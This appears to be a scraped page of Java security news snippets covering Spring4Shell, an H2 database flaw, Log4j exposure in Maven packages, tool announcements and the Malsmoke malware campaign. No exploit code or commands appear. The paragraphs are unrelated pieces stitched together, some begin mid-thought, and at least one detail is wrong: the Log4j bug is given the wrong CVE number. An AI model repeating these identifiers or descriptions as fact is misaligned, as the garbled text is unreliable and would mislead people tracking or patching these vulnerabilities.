Security News

A zero-day remote code execution vulnerability has come to light in the Spring framework shortly after a Chinese security researcher briefly leaked a proof-of-concept exploit on GitHub before deleting their account. According to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit versions 9 and later and is a bypass for another vulnerability tracked as CVE-2010-1622, enabling an unauthenticated attacker to execute arbitrary code on the target system.

VMWare Spring is a open-source Java toolkit for building powerful Java apps, including cloud-based apps, without needing to write, manage, worry about, or even understand the "Server" part of the process yourself. You don't need to worry about, or even care, what sort of server your code is running on: it could be a server of your own, set up and managed by your colleagues in IT; or a cloud instance hosted and executing on a popular cloud service provider.

A new zero-day vulnerability in the Spring Core Java framework called 'Spring4Shell' has been publicly disclosed, allowing unauthenticated remote code execution on applications. Spring is a very popular application framework that allows software developers to quickly and easily develop Java applications with enterprise-level features.

This time, the bug isn't in Apache's beleagured Log4j toolkit, but can be found in a popular Java SQL server called the H2 Database Engine. As a result, you can bundle the H2 SQL database code right into your own Java apps, and run your databases entirely in memory, with no need for separate server processes.

There's an enormous amount of software vulnerable to the Log4j bug through Java software supply chains - and administrators and security pros likely don't even know where to look for it. About 17,000 Java packages in the Maven Central repository, the most significant collection of Java packages available to developers, are vulnerable to Log4j - and it will likely take "Years" for it to be fixed across the ecosystem, according to Google security.

The bug, now officially denoted CVE-2021-44248, involves sending a request to a vulnerable server in which you include some data - for example, an HTTP header - that you expect the server will write to its logfile. Not just any old download: if the data that comes back is a valid Java program, then the server runs that file to "Help" it generate the logging data.

Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to remote code execution attacks. Log4j is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.

SmartBear has released a new plug-in for SwaggerHub API design to support IntelliJ IDEA, the popular Java-based integrated developer environment. API developers familiar with IntelliJ IDEA now have ready access to the OpenAPI compliant SwaggerHub API design platform to create, organize, and document APIs.

Red Hat announced Red Hat JBoss Enterprise Application Platform on Microsoft Azure, enabling organizations to tap into the benefits of a cloud-based architecture for modernizing their existing Jakarta EE applications and building new ones on Azure. Customers can bring existing applications to Azure-including JBoss EAP applications running on-premises or other Jakarta EE applications running on different application servers-choosing how they want to manage business critical, Java-based applications in the cloud.

A malware campaign ongoing since the beginning of the year has recently changed tactics, switching from exploit kits to social engineering to target adult content consumers. Malwarebytes monitored the Malsmoke campaign all year long delivering Smoke Loader - a malware dropper - via Fallout exploit kit until its track went cold on October 18.